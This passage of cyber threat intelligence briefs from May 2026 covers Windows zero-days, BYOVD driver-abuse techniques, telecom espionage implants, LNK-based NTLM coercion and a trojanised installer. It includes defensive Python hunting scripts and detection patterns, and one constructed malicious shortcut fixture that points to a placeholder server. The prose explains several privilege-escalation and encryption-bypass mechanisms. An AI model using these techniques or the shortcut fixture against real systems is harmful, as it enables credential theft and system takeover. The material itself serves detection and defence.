Chaotic Eclipse / Nightmare Eclipse — MiniPlasma confirmed SYSTEM on a fully-patched Windows 11; sixth zero-day in six weeks

From CTI Weekly Summary — 2026-W22 (May 25 – May 31, 2026) · published 2026-05-25

The Windows zero-day cluster carried a material technical update beyond the 2026-05-30 daily. MiniPlasma — the sixth zero-day the "Chaotic Eclipse" researcher has dropped in six weeks — is a local privilege escalation in the Windows Cloud Filter driver (cldflt.sys) that re-exploits the code path of CVE-2020-17103, the researcher claiming the 2020 patch was incomplete or partially reverted. ThreatLocker independently confirmed MiniPlasma achieves SYSTEM on a fully-patched Windows 11 running the May 2026 cumulative update, i.e. there is no configuration that closes it today. Three earlier drops in the series (BlueHammer, RedSun, UnDefend) have been observed in real attacks. Microsoft's DCU has called the uncoordinated releases "never justifiable" but has shipped no out-of-band fix; the 9 June Patch Tuesday is the first fix opportunity (see § 9). Until then, treat any cldflt.sys-adjacent LPE as live.

Atos TRC: "hardware-gated" Windows drivers can be made BYOVD-exploitable in software

From CTI Daily Brief — 2026-05-24 · published 2026-05-24

Research from the Atos Trusted Research Center (referenced by NDSS Symposium 2026 paper 2026-s1491), resurfaced in in-window reporting on 2026-05-22, argues that a large class of Windows kernel-mode drivers previously treated as BYOVD-resistant — because triggering their vulnerable IOCTL paths supposedly required physical hardware — can be made fully exploitable without that hardware (The Hacker News, 2026-05-22). Three techniques remove the gate: binding a PnP driver's AddDevice callback to a software-emulated device with an attacker-chosen hardware ID (via SetupAPI / the Software Device API); filter-driver restacking on disk/storage device stacks to bind otherwise-unloadable drivers; and direct registry manipulation under HKLM\SYSTEM\CurrentControlSet\Control\Class to associate a vulnerable driver with an existing device object. The write-up frames these against real-world example drivers to show IOCTL code paths reachable without the assumed hardware (Atos TRC, 2026-04-17).

Why it matters to us: BYOVD is a staple kernel-level EDR-bypass technique for ransomware affiliates and APTs operating against EU/CH targets, and this work expands the effective LOLDrivers attack surface — vulnerable-driver blocklists that implicitly assume a hardware prerequisite need re-evaluation. Hunt HKLM\SYSTEM\CurrentControlSet\Control\Class writes to UpperFilters/LowerFilters/ClassFilters from non-SYSTEM processes (Sysmon EID 13), driver-load events (Sysmon EID 6) for drivers loaded from user-writable paths, and streaming/thunk-class kernel drivers loaded by a non-system process. Hardening: enforce the Microsoft Vulnerable Driver Blocklist (WDAC) and HVCI/Memory Integrity, and re-test blocklist coverage against these hardware-gate-bypass techniques. ATT&CK T1068, T1014, T1562.001.
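The two hunt pivots above (class-filter list writes by a non-SYSTEM process, driver loads from user-writable paths) as detection logic over Sysmon-style records, added here as an example that is neither Atos nor Sysmon code. Field names follow Sysmon's EID 13 (TargetObject, Image, User, Details) and EID 6 (ImageLoaded, Signed, SignatureStatus); the sample events are constructed, using the real DiskDrive class GUID and its PartMgr upper filter as the benign case.

```python
"""Hunt for the Atos TRC hardware-gate-bypass artefacts over Sysmon-style records.

Added example, not Atos or Sysmon code. Field names follow Sysmon EID 13 / EID 6;
the sample events are constructed.
"""
import re

SYSTEM_ACCOUNTS = {"nt authority\\system", "system"}

# ...\Control\Class\{GUID}\UpperFilters | LowerFilters | ClassFilters
_CLASS_FILTER = re.compile(
    r"\\control\\class\\\{[0-9a-f-]{36}\}\\(upperfilters|lowerfilters|classfilters)$", re.I)

# Roots an unprivileged user can write to; a kernel driver loaded from here is suspect.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\temp\\")


def class_filter_write(ev):
    """EID 13 (RegistryEvent SetValue) on a device-class filter list by a
    non-SYSTEM process. Returns a finding dict or None."""
    if ev.get("EventID") != 13:
        return None
    target = ev.get("TargetObject", "")
    if not _CLASS_FILTER.search(target):
        return None
    if ev.get("User", "").lower() in SYSTEM_ACCOUNTS:
        return None
    return {"rule": "class-filter-write-non-system", "image": ev.get("Image"),
            "user": ev.get("User"), "target": target, "details": ev.get("Details")}


def driver_from_writable_path(ev):
    """EID 6 (DriverLoad) where the image sits under a user-writable root or
    the signature is not valid."""
    if ev.get("EventID") != 6:
        return None
    path = ev.get("ImageLoaded", "").lower()
    bad_path = path.startswith(USER_WRITABLE)
    bad_sig = ev.get("SignatureStatus", "").lower() != "valid"
    if not (bad_path or bad_sig):
        return None
    return {"rule": "driver-load-suspect", "image": ev.get("ImageLoaded"),
            "signed": ev.get("Signed"), "status": ev.get("SignatureStatus"),
            "reason": "user-writable path" if bad_path else "signature not valid"}


def hunt(events):
    findings = []
    for ev in events:
        for rule in (class_filter_write, driver_from_writable_path):
            f = rule(ev)
            if f:
                findings.append(f)
    return findings


# Constructed sample. {4d36e967-...} is the DiskDrive device class; PartMgr is its
# normal upper filter, written here by SYSTEM (benign). The user-context write and
# the driver under a user profile are the cases the hunt should surface.
DISK_CLASS = r"HKLM\System\CurrentControlSet\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318}"
SAMPLE = [
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\Temp\loader.exe",
     "User": r"CORP\alice", "TargetObject": DISK_CLASS + r"\UpperFilters", "Details": "evil"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "User": r"NT AUTHORITY\SYSTEM", "TargetObject": DISK_CLASS + r"\UpperFilters",
     "Details": "PartMgr"},
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\Temp\loader.exe",
     "User": r"CORP\alice",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\x", "Details": "x"},
    {"EventID": 6, "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\vuln.sys",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\disk.sys",
     "Signed": "true", "SignatureStatus": "Valid"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE):
        print(f)
```

A validly signed driver in a user profile is still a finding: the Atos techniques load drivers that are signed and previously considered harmless, so the path and the writing principal carry the signal, not the signature alone.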

Calypso/Red Lamassu (Bronze Medley) deploys Showboat (Linux) and JFMBackdoor (Windows) against telecoms — new implant pair disclosed by Lumen Black Lotus Labs and PwC Threat Intelligence

From CTI Daily Brief — 2026-05-22 · published 2026-05-22

Lumen's Black Lotus Labs and PwC Threat Intelligence disclosed on 2026-05-21 two purpose-built implants used by the China-aligned espionage cluster Calypso (also tracked as Red Lamassu, Bronze Medley — active since at least mid-2022 based on binary upload and victim telemetry) in a multi-year campaign against telecommunications providers (Lumen Black Lotus Labs, 2026-05-21 · PwC Threat Intelligence, 2026-05-21). Confirmed victims include a Middle East ISP, an Afghanistan ISP, and entities in Azerbaijan, the US, and Ukraine; European telecoms are within the actor's documented targeting pattern. Showboat is a modular ELF binary masquerading as a Linux kernel worker thread (kworker; T1036.005 Masquerading: Match Legitimate Name or Location) providing remote shell (T1059.004), bidirectional file transfer, SOCKS5 proxy to internal network segments (T1090.001 Internal Proxy), and a hide command that fetches a rootkit payload from Pastebin at runtime (T1102.001 Dead Drop Resolver); exfiltrated data is carried base64-encoded inside PNG image fields to blend with web traffic (Lumen Black Lotus Labs, 2026-05-21). JFMBackdoor, the Windows counterpart, is delivered via DLL sideloading (T1574.002): a batch script drops a legitimate signed executable that loads the malicious DLL, providing remote shell, file operations, SOCKS5 proxy, and self-removal (PwC Threat Intelligence, 2026-05-21). C2 infrastructure clusters to Chengdu, Sichuan-geolocated IP ranges; X.509 certificate SAN/CN patterns link the victim set (Lumen Black Lotus Labs, 2026-05-21). Detection: hunt for kworker ELF processes whose parent is not kthreadd (PID 2) on Linux telecom servers (auditd EXECVE or Sysmon for Linux EID 1 parent-pid check); alert on unsigned DLLs loaded by vendor-signed executables (Sysmon EID 7: signed process, unsigned module); flag egress DNS queries or HTTP GET to pastebin.com from daemon-context processes.
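The kworker parent check from the detection list, as an added example that is neither Lumen's nor PwC's code: genuine kernel threads are children of kthreadd (PID 2), so a process whose name looks like a kernel thread but whose parent is anything else is a masquerade candidate. The input is the text of `ps -eo pid,ppid,comm`; the sample output below is constructed.

```python
"""Flag user-space processes masquerading as kernel worker threads.

Real kworker/ksoftirqd/... threads are children of kthreadd (PID 2).
Added example, not Lumen or PwC code; input is `ps -eo pid,ppid,comm` text,
and the sample is constructed.
"""
KTHREADD_PID = 2
KERNEL_THREAD_PREFIXES = ("kworker", "ksoftirqd", "kswapd", "migration", "rcu_")


def parse_ps(text):
    """Rows of (pid, ppid, comm) from `ps -eo pid,ppid,comm`; the header is skipped."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            rows.append((int(parts[0]), int(parts[1]), parts[2].strip()))
    return rows


def fake_kernel_threads(text):
    """Processes named like a kernel thread whose parent is not kthreadd.
    Returns [(pid, ppid, comm)] in ps order."""
    return [(pid, ppid, comm) for pid, ppid, comm in parse_ps(text)
            if comm.startswith(KERNEL_THREAD_PREFIXES) and ppid != KTHREADD_PID]


# Constructed sample: PIDs 4123/4124 reuse the kworker name but hang off
# systemd and each other, the Showboat pattern.
SAMPLE_PS = """\
    PID    PPID COMMAND
      1       0 systemd
      2       0 kthreadd
     15       2 kworker/0:1
     16       2 ksoftirqd/0
    812       1 sshd
   4123       1 kworker/u8:3
   4124    4123 kworker/u8:3
"""

if __name__ == "__main__":
    for pid, ppid, comm in fake_kernel_threads(SAMPLE_PS):
        print(f"suspect: pid={pid} ppid={ppid} comm={comm}")
```

On a live host, corroborate a hit by checking whether /proc/PID/exe resolves: a real kernel thread has no backing executable, a masquerading ELF does.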

UPDATE: Chaotic Eclipse Windows zero-days — MiniPlasma is third PoC in series; cldflt.sys CfAbortHydration path, claimed re-exploitable CVE-2020-17103 regression

From CTI Daily Brief — 2026-05-19 · published 2026-05-19

UPDATE (originally covered 2026-05-15): Researcher "Chaotic Eclipse" / "Nightmare Eclipse" released a third unpatched Windows LPE PoC on 2026-05-17 — MiniPlasma — extending the YellowKey and GreenPlasma series covered in the 2026-05-15 daily (BleepingComputer, 2026-05-17; The Hacker News, 2026-05-18). The material new technical detail: MiniPlasma targets the cldflt.sys Cloud Filter Mini Filter Driver — specifically the HsmOsBlockPlaceholderAccess routine — and abuses the undocumented CfAbortHydration API to create arbitrary registry keys in the .DEFAULT user hive without proper ACL checks, escalating from standard user to SYSTEM. The flaw was originally reported by Google Project Zero (James Forshaw) in September 2020 and nominally patched in December 2020 as CVE-2020-17103; Chaotic Eclipse asserts the exact same code path remains exploitable on fully-patched Windows 11 with May 2026 cumulative updates applied. Will Dormann independently confirmed the PoC opens a SYSTEM cmd.exe reliably on Windows 11 Pro fully patched. The exploit reportedly fails on the latest Insider Preview Canary builds, suggesting Microsoft has a fix in the pipeline but has not yet released an out-of-band patch. ThreatLocker published two registry-path hunt pivots: \Registry\User\Software\Policies\Microsoft\CloudFiles\BlockedApps* and \Registry\User\.DEFAULT\Volatile Environment*.

Defender takeaway: the proliferation of unpatched LPEs from one researcher signals an extended period of SYSTEM-shell availability for any attacker that lands user-level execution on Windows endpoints. Sysmon EID 13 (RegistryEvent / SetValue) on the .DEFAULT hive from non-SYSTEM processes is the primary hunt pivot; Sysmon EID 6 driver-load monitoring catches related driver-abuse paths. Hardening: BitLocker PIN mitigates the companion YellowKey BitLocker bypass; disabling Cloud Files / OneDrive integration removes the MiniPlasma attack surface but is not practical in most environments. MITRE T1068 (Exploitation for Privilege Escalation).

Windows "Chaotic Eclipse" zero-day proliferation — YellowKey, GreenPlasma, MiniPlasma

From CTI Weekly Summary — 2026-W21 (May 18 – May 24, 2026) · published 2026-05-18

The researcher cluster "Chaotic Eclipse" / "Nightmare Eclipse" continued releasing unpatched Windows LPE/bypass PoCs across the window. On 2026-05-19 a third PoC — MiniPlasma — landed, targeting the cldflt.sys CfAbortHydration path and claiming a re-exploitable regression of the 2020-era CVE-2020-17103. On 2026-05-20 Microsoft formally assigned CVE-2026-45585 to the BitLocker/WinRE bypass (YellowKey) disclosed on 2026-05-12 and published a WinRE mitigation — but confirmed there is still no security update for the cluster; the earliest fix window remains the June 2026 Patch Tuesday. Three public PoCs (YellowKey, GreenPlasma, MiniPlasma) now exist against the Windows-centric desktop estates standard in CH/EU federal and cantonal administrations. Until a patch ships, enforce BitLocker PIN/Network-Unlock GPOs and AppLocker/WDAC rules on ctfmon.exe injection paths, and segregate privileged accounts from the workstation tier.

Windows BitLocker "YellowKey" + CTFMON "GreenPlasma" — public PoC, no patch, TPM-only BitLocker bypassed

From CTI Weekly Summary — 2026-W20 (May 11 – May 17, 2026) · published 2026-05-17

If you did nothing this week: every Windows endpoint configured with TPM-only BitLocker (no PIN, no startup key — the most common laptop configuration in Swiss federal and cantonal estates) is bypassable by an attacker with brief physical access using the publicly-disclosed YellowKey PoC; every Windows endpoint running the CTFMON Text Services Framework loader (ctfmon.exe, present by default on Windows 10/11/Server 2022/2025) is locally elevation-of-privilege-vulnerable via the GreenPlasma primitive. Both zero-days were disclosed without coordinated vendor patching; Microsoft's May 2026 Patch Tuesday (120+ CVEs) did not address either, and no out-of-band advisory has been issued (daily 2026-05-15).

The operational reality for Swiss public-sector defenders is that the laptop full-disk-encryption story is materially weakened until Microsoft ships a fix. The interim guidance is to enforce BitLocker PIN-or-startup-key on every endpoint where physical-access risk is non-trivial (mobile estates, off-site work, hotel travel) — the GPO toggle is Computer Configuration → Administrative Templates → Windows Components → BitLocker Drive Encryption → Operating System Drives → Require additional authentication at startup. For GreenPlasma the only available control is privileged-account-segregation discipline: workstations that handle administrative credentials should not also run unprivileged user workloads where the local-EOP can be staged.

Windows BitLocker "YellowKey" and CTFMON "GreenPlasma" — public PoC, no patch

From CTI Weekly Summary — 2026-W20 (May 11 – May 17, 2026) · published 2026-05-17

See § 1 H3 for full operational framing. Listed here for vulnerability-roll-up completeness. No CVE identifiers had been allocated by Microsoft as of 2026-05-17.

AMD-SB-7052 / CVE-2025-54518 — AMD Zen 2 µop-cache corruption / SoC isolation failure: local privilege escalation (CVSS 7.3), microcode mitigation in May 2026 Windows update and Xen XSA-490

From CTI Daily Brief — 2026-05-16 · published 2026-05-16

AMD disclosed AMD-SB-7052 (CVE-2025-54518, CVSS 7.3 on the CVSS 4.0 scale, CWE-1189 Improper Isolation of Shared Resources on System-on-Chip) affecting Zen 2-based processor models on 2026-05-12, with NCSC-NL flagging the advisory on 2026-05-15 (AMD Product Security, 2026-05-12 · NCSC-NL NCSC-2026-0158, 2026-05-15). The flaw allows a local attacker with code execution on the target system to corrupt the CPU micro-operation (µop) cache and thereby cause instructions to execute at a higher privilege level than intended, enabling local privilege escalation and, in virtualisation contexts, potential degradation of hypervisor-level isolation. Mitigation is delivered as microcode integrated into the May 2026 Microsoft Windows cumulative update (the same window as the previously covered CVE-2026-41089 / 41096 Patch Tuesday set); Fedora has issued separate kernel + microcode updates (advisory IDs per NCSC-NL CSAF references) and Xen has published XSA-490 for bare-metal hypervisor operators. Lenovo has published a product-security advisory covering affected ThinkPad / ThinkStation / Workstation models for BIOS / UEFI guidance. Attack class: T1068 Exploitation for Privilege Escalation, with elevated relevance in confidential-compute and multi-tenant virtualisation contexts (VDI estates, cloud-hosted VMs on Zen 2 hosts, shared university compute clusters). No in-the-wild exploitation confirmed. Detection / verification: confirm the May 2026 Windows CU includes the AMD microcode revision via the relevant KB and identify affected hosts with wmic cpu get name, dataWidth, processorId; for Linux hypervisors apply distro kernel + microcode updates and reboot; for Xen apply XSA-490; for Lenovo hardware check BIOS / UEFI update guidance per LEN-216977. The local-only attack vector limits external risk; the priority is multi-tenant and virtualisation contexts where guest-to-hypervisor or container-to-host isolation is part of the security boundary.

CVE Summary Table

CVE | Product | CVSS | EPSS | KEV | Exploited | Patch | Source
CVE-2026-42897 | Microsoft Exchange Server 2016 / 2019 / SE — OWA | 8.1 (v3.1) | n/a | Yes (added 2026-05-15) | Yes — Microsoft confirmed | No permanent patch; EEMS Mitigation M2 (auto / EOMT manual) | Microsoft MSRC
CVE-2026-44112 | OpenClaw / Clawdbot — OpenShell sandbox (TOCTOU write escape) | 9.6 (Critical) | n/a | No | No | OpenClaw 2026-04-23 release (GHSA-5h3g-6xhh-rg6p) | Cyera Research
CVE-2026-44115 | OpenClaw / Clawdbot — command-parser allowlist bypass | 8.8 (High) | n/a | No | No | OpenClaw 2026-04-23 release (GHSA-wppj-c6mr-83jj) | Cyera Research
CVE-2026-44118 | OpenClaw / Clawdbot — MCP loopback senderIsOwner trust | 7.8 (High) | n/a | No | No | OpenClaw 2026-04-23 release (GHSA-r6xh-pqhr-v4xh) | Cyera Research
CVE-2026-44113 | OpenClaw / Clawdbot — TOCTOU read escape (file disclosure) | 7.7 (High) | n/a | No | No | OpenClaw 2026-04-23 release (GHSA-x3h8-jrgh-p8jx) | Cyera Research
CVE-2025-54518 (AMD-SB-7052) | AMD Zen 2 CPUs — µop cache / SoC isolation LPE | 7.3 (CVSS 4.0) | n/a | No | No | May 2026 Windows CU; Fedora kernel + microcode updates; Xen XSA-490 | AMD Product Security

Windows BitLocker "YellowKey" and CTFMON "GreenPlasma" zero-days: public PoC, no patch, TPM-only BitLocker bypassed

From CTI Daily Brief — 2026-05-15 · published 2026-05-15

Researcher "Nightmare Eclipse" published two new unpatched Windows zero-days on 2026-05-12–13 as full-disclosure drops after a disclosure dispute with Microsoft, bringing the total of unpatched Nightmare Eclipse Windows zero-days to four (BleepingComputer, 2026-05-13 · The Register, 2026-05-13 · NCSC-CH Security Hub #12574, 2026-05-14). YellowKey exploits a Windows Recovery Environment (WinRE) bug in NTFS transaction-log (TxF/FsTx) replay: crafted FsTx folder contents placed on a USB drive or the EFI partition are replayed by WinRE during startup, deleting winpeshl.ini — the file that suppresses the recovery shell — and dropping the attacker into a CMD prompt with the BitLocker-protected volume already mounted and readable. The current public PoC defeats TPM-only BitLocker configurations on Windows 11 and Windows Server 2022/2025; the researcher asserts the full bypass also defeats TPM+PIN but the unpublished variant is unconfirmed. MITRE ATT&CK: T1542.001 (Pre-OS Boot: System Firmware), T1006 (Direct Volume Access). GreenPlasma is a local privilege-escalation flaw in the CTFMON (Collaborative Translation Framework) service: an unprivileged user creates arbitrary section objects in SYSTEM-writable directories, which can be leveraged to manipulate privileged services for a SYSTEM token; the public PoC is partial and the exploit chain triggers a UAC prompt in default configurations. MITRE ATT&CK: T1134 (Access Token Manipulation), T1068 (Exploitation for Privilege Escalation). Neither vulnerability has been assigned a CVE nor received a Microsoft patch as of 2026-05-15; Microsoft states it is "actively investigating." A previous drop by the same researcher (BlueHammer, CVE-2026-33825, now patched) was confirmed used in real-world intrusions by Huntress in April 2026, demonstrating that this researcher's PoCs are operationally adopted. 
Immediate mitigations: require BitLocker pre-boot PIN (Group Policy Computer Configuration > Administrative Templates > Windows Components > BitLocker Drive Encryption > Require additional authentication at startup); set BIOS/UEFI boot password and disable USB/external-media boot; disable WinRE where operationally viable (reagentc /disable).

Microsoft MDASH — multi-model agentic vulnerability-discovery harness finds 16 Windows CVEs in network-stack kernel components

From CTI Daily Brief — 2026-05-13 · published 2026-05-13

Microsoft's Autonomous Code Security team published a detailed technical disclosure on 2026-05-12 of MDASH, an AI-orchestrated vulnerability-discovery pipeline running over 100 specialised agents across an ensemble of frontier and distilled models (Microsoft Security Blog, 2026-05-12). The pipeline executes a five-stage prepare → scan → validate → dedup → prove loop that ends with an automated end-to-end exploitability proof before a finding is sent to engineering — meaning every MDASH-disclosed CVE was validated as practically exploitable, not just theoretically reachable. In MDASH's first production run against Windows the harness produced 16 previously unknown CVEs concentrated in the network-exposed kernel attack surface — tcpip.sys (Windows TCP/IP stack), ikeext.dll (the Windows IKEv2 keying service for DirectAccess and Always-On VPN), netlogon.dll, and dnsapi.dll — split as 10 kernel-mode and 6 user-mode bugs, including four Critical RCEs. The harness scored 88.45% on the public CyberGym benchmark (1,507 real-world CVEs across 188 open-source projects) and achieved 100% recall on the tcpip.sys historical-CVE corpus (The Register, 2026-05-13). Microsoft has scheduled a customer-facing preview of the harness for June 2026.

Defender takeaway: Two operational implications. First, the MDASH-discovered Windows CVEs (a substantial subset of the May 2026 Patch Tuesday in § 2) should be treated as "practically exploitable" even without observed ITW activity, because the proof-of-exploitability stage runs before disclosure — that lifts these above the typical "Less Likely / More Likely" scoring noise. Second, the ikeext.dll surface is directly relevant to EU public-sector remote-access deployments: DirectAccess and Always-On VPN are widely deployed as the AD-integrated remote-access primitive across Swiss federal and EU government estates; any unauthenticated bug in ikeext.dll is a remote-perimeter risk. Mapped to T1190 Exploit Public-Facing Application and T1133 External Remote Services. Hardening: expedite May 2026 cumulative update on internet-exposed Windows hosts with DirectAccess / Always-On VPN; verify the network-perimeter ACL still scopes IKEv2 reach to known client networks.

CVE-2026-32202 — Windows Shell NTLM coercion; Akamai's PatchDiff-AI shows the residual zero-click path left by the CVE-2026-21510 patch

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11

Despite the low base CVSS of 4.3 (network vector, no privileges, user interaction required), this is a priority-patch item for any organisation in scope of APT28's targeting of the predecessor vulnerability: APT28 (Fancy Bear) was attributed by CERT-UA to the predecessor CVE-2026-21510 LNK exploitation against Ukraine and EU countries in December 2025 (Akamai Security Research). Microsoft flipped the "exploited" flag on CVE-2026-32202 on 2026-04-27 (Help Net Security, 2026-04-29); neither Akamai nor Help Net Security explicitly attributes current CVE-2026-32202 in-the-wild exploitation to APT28, so the actor for CVE-2026-32202 exploitation specifically remains publicly unattributed at week-end (Microsoft MSRC — CVE-2026-32202 · daily 2026-05-08). Akamai's PatchDiff-AI analysis published 2026-04-23 reveals that Microsoft's February 2026 patch for CVE-2026-21510 successfully blocked RCE and SmartScreen bypass but left a residual zero-click NTLM coercion path intact — now tracked as CVE-2026-32202 (Akamai Security Research, 2026-04-23 · Help Net Security, 2026-04-29).

The mechanism: Windows Explorer automatically resolves UNC paths embedded in the LinkTargetIDList structure of malicious LNK files via PathFileExistsW, triggering an outbound SMB authentication handshake that leaks the user's Net-NTLMv2 hash to an attacker-controlled server — folder-open is sufficient, no user click required. Trust verification was applied only during ShellExecuteExW calls in the February 2026 patch, not in the earlier code paths where the credential theft occurs. Microsoft confirmed active exploitation on 2026-04-27 and CISA added CVE-2026-32202 to KEV the following day with a deadline of 2026-05-12. The April 14 patch shipped without the "exploited" flag, creating a 13-day window where security teams had no formal signal to treat it as urgent. Net-NTLMv2 hashes can be relayed (NTLM relay attacks) or cracked offline — both paths to lateral movement.

Patch path: April 2026 Windows cumulative updates. Supplementary controls are blocking outbound TCP 445 to non-business internet destinations at the perimeter firewall, enabling the "Restrict NTLM" Group Policy (set to "Deny all" for outbound), and migrating authentication to Kerberos-only where operationally feasible. Detection priorities for SOC hunting: SMBv2 outbound connections from explorer.exe to non-corporate IPs; NTLM authentication event 4625 / 4776 with Net-NTLMv2 from workstations; LNK file inspection at mail gateway and EDR for LinkTargetIDList entries pointing to UNC paths. ATT&CK: T1187 Forced Authentication, T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay.
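As an added example of the LNK inspection named in the detection priorities above (it applies equally to the two CVE-2026-32202 items further down), the following Python parser walks the ShellLink header and LinkTargetIDList and flags ItemIDs that carry a UNC target. It is not code from the brief, Akamai or Microsoft; the shortcut samples are constructed inline and the 192.0.2.10 / fileserver.example names are documentation placeholders.

```python
"""Flag LNK shortcuts whose LinkTargetIDList carries a UNC (\\server\share) target.

Added example for the CVE-2026-32202 items; not code from the brief, Akamai or
Microsoft. Walks the MS-SHLLINK header and LinkTargetIDList (the structure the
brief names) and returns any UNC string found in an ItemID, in ASCII or UTF-16LE.
Sample shortcuts below are constructed inline; 192.0.2.10 / fileserver.example
are documentation placeholders, not real infrastructure.
"""
import re
import struct

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}, LE
HAS_LINK_TARGET_ID_LIST = 0x1                                   # LinkFlags bit A
UNC_ASCII = re.compile(rb"\\\\[\w.\-]+\\[\x20-\x7e]+")
UNC_UTF16 = re.compile(rb"(?:\\\x00){2}(?:[\w.\-]\x00)+\\\x00(?:[\x20-\x7e]\x00)+")


def link_target_unc_paths(data: bytes) -> list[str]:
    """Return UNC targets found in the LinkTargetIDList; [] if none or not a ShellLink."""
    if len(data) < HEADER_SIZE + 2 or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        return []
    if data[4:20] != LNK_CLSID:
        return []
    flags = struct.unpack_from("<I", data, 0x14)[0]
    if not flags & HAS_LINK_TARGET_ID_LIST:
        return []
    id_list_size = struct.unpack_from("<H", data, HEADER_SIZE)[0]
    pos, end = HEADER_SIZE + 2, min(len(data), HEADER_SIZE + 2 + id_list_size)
    found = []
    while pos + 2 <= end:
        item_size = struct.unpack_from("<H", data, pos)[0]
        if item_size < 2:                        # 0x0000 TerminalID closes the IDList
            break
        item = data[pos + 2:pos + item_size]    # ItemID data; network items carry ANSI strings
        found += [m.group().decode("ascii", "replace") for m in UNC_ASCII.finditer(item)]
        found += [m.group().decode("utf-16-le", "replace") for m in UNC_UTF16.finditer(item)]
        pos += item_size
    # A full scanner should also inspect LinkInfo's CommonNetworkRelativeLink; omitted here.
    return found


def build_lnk(flags: int, item_ids: list[bytes]) -> bytes:
    """Constructed minimal ShellLink: 76-byte header followed by a LinkTargetIDList."""
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))          # remaining header fields zeroed
    body = b"".join(struct.pack("<H", len(d) + 2) + d for d in item_ids) + b"\x00\x00"
    return header + struct.pack("<H", len(body)) + body


# Constructed samples: a UNC target (the coercion pattern), the same in UTF-16LE, and a benign local path.
MALICIOUS_LNK = build_lnk(HAS_LINK_TARGET_ID_LIST,
                          [b"\x1f\x50" + b"\x00" * 16, b"\xc3\x01\\\\192.0.2.10\\share\x00"])
UTF16_LNK = build_lnk(HAS_LINK_TARGET_ID_LIST,
                      [b"\x2e\x80" + "\\\\fileserver.example\\docs".encode("utf-16-le")])
BENIGN_LNK = build_lnk(HAS_LINK_TARGET_ID_LIST,
                       [b"\x1f\x50" + b"\x00" * 16, b"\x32\x00C:\\Users\\Public\\notes.txt\x00"])

if __name__ == "__main__":
    for name, blob in [("malicious", MALICIOUS_LNK), ("utf16", UTF16_LNK), ("benign", BENIGN_LNK)]:
        print(name, link_target_unc_paths(blob))
```

Run at a mail gateway or over EDR-collected shortcuts, any non-empty result is a candidate for the T1187 pattern described above.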

JDownloader official site compromised — Windows and Linux installers swapped for ~48 hours

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11

The official download page of JDownloader (German-developed AppWork GmbH, Java-based download manager popular across European user bases) was compromised between approximately 2026-05-06 and 2026-05-08; attackers exploited an unpatched access-control flaw in the site's CMS layer to replace Windows and Linux installer download links without altering the main JAR, the in-app updater, the macOS bundle, or the package-manager distributions (Winget, Flatpak, Snap). Trojanised Windows executables bore forged publisher names — "Zipline LLC", "The Water Team", "Peace Team" — triggering Windows SmartScreen warnings that helped some users detect the substitution. The substituted installers carry a Python-based remote-access payload; a more specific capability description has not been corroborated by a named research lab in available reporting. The JDownloader team confirmed the compromise and asked users to verify file hashes against the project's published SHA-256 manifest (PiunikaWeb, 2026-05-08 · CyberKendra, 2026-05-07 · daily 2026-05-10). Defender takeaway: audit developer / power-user / multimedia-engineering workstations across DACH for JDownloader installers downloaded between 2026-05-06 and 2026-05-08 from the official site or "Alternative Installer" link; hunt for unsigned / non-AppWork-signed JDownloader*.exe, unexpected Python interpreters in user-profile paths, and Python child processes spawned from JDownloader parent images.

JDownloader official site compromised — Windows and Linux installers swapped for a Python RAT for ~48 hours

From CTI Daily Brief — 2026-05-10 · published 2026-05-10

The official download page of JDownloader, a German-developed (AppWork GmbH) Java-based download manager popular across European user bases, was compromised between approximately 2026-05-06 and 2026-05-08; attackers replaced the Windows and Linux installers with malicious counterparts (PiunikaWeb, 2026-05-08 · CyberKendra, 2026-05-07). The intrusion exploited an unpatched access-control flaw in the site's content-management layer, allowing unauthenticated modification of download-link targets without altering the main JAR, the in-app updater, the macOS bundle, or the package-manager distributions (Winget, Flatpak, Snap). Trojanised Windows executables bore forged publisher names — "Zipline LLC", "The Water Team", "Peace Team" — instead of the legitimate AppWork GmbH signature, triggering Windows SmartScreen warnings that helped some users detect the substitution before execution. The substituted installers are described in available reporting as carrying a Python-based remote-access payload; the precise capability description has not been corroborated by a named research lab in this run's window (see § 7). The JDownloader team confirmed the breach and has asked users to verify file hashes against the project's published SHA-256 manifest.

ATT&CK mapping: T1195.002 Supply Chain Compromise: Software Supply Chain, T1036.005 Match Legitimate Name (forged AppWork-adjacent publisher names), T1059.006 Python for the RAT runtime.

Defender takeaway: Audit endpoints — particularly developer / power-user / multimedia-engineering workstations across DACH — for JDownloader installers downloaded between 2026-05-06 and 2026-05-08 from the official site. Hunt for unsigned or non-AppWork-signed JDownloader*.exe and unexpected Python interpreters in user-profile paths; alert on Python child processes spawned from JDownloader* parent images (Sysmon EID 1 + parent-image filter). Installations obtained via Winget / Flatpak / Snap are out of scope for this hunt (those distributions were not poisoned in this window) — the trojanised path was specifically the project's web-hosted installer and "Alternative Installer" download links.
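As an added example serving both JDownloader items (not code from the brief or from AppWork), the following Python snippet runs the three hunts listed above over constructed Sysmon Event ID 1 records. The manifest hashes, file paths and the per-user Python install baseline it excludes are assumptions, not values from the project.

```python
"""Run the brief's three JDownloader hunts over constructed Sysmon Event ID 1 records.

Added example, not code from the brief or AppWork. Rules: (1) a JDownloader*.exe whose
SHA-256 is not in the project's published manifest, (2) a Python interpreter living in a
user-profile path outside the per-user Python install location, (3) a Python child of a
JDownloader* parent image. Events and manifest hashes below are constructed placeholders.
"""
import fnmatch
import ntpath
import re

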